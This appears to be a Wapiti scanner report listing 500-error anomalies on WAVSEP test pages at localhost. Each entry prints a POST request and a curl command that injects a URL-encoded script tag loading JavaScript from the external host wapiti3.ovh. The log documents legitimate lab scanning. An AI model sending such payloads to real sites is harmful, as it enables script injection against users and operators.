curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi0jelppa2z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjvgwocwl4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjvgwocwl4z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2yphw8dc4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2yphw8dc4z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fweqxfnvn6yz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fweqxfnvn6yz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzmyihg7kyz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzmyihg7kyz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwevt8ae4n4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwevt8ae4n4z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfwkiul2ybz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfwkiul2ybz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw74b7bj4s3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw74b7bj4s3z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpxk80k8x5z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpxk80k8x5z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw83lie52mkz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw83lie52mkz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwq3797i7dmz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwq3797i7dmz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwqx2d65zsz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwqx2d65zsz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj5ft2ov2lz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj5ft2ov2lz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwy8hef8h2ez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwy8hef8h2ez.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb3xxt7gw3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb3xxt7gw3z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwddqjk5y9dz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwddqjk5y9dz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwv5wtwvxk8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwv5wtwvxk8z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbvatpx292z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbvatpx292z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt67r8acwoz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt67r8acwoz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwk2ciy5c81z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwk2ciy5c81z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo6pj8oyl4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo6pj8oyl4z.js%3E%3C%2Fscript%3E"

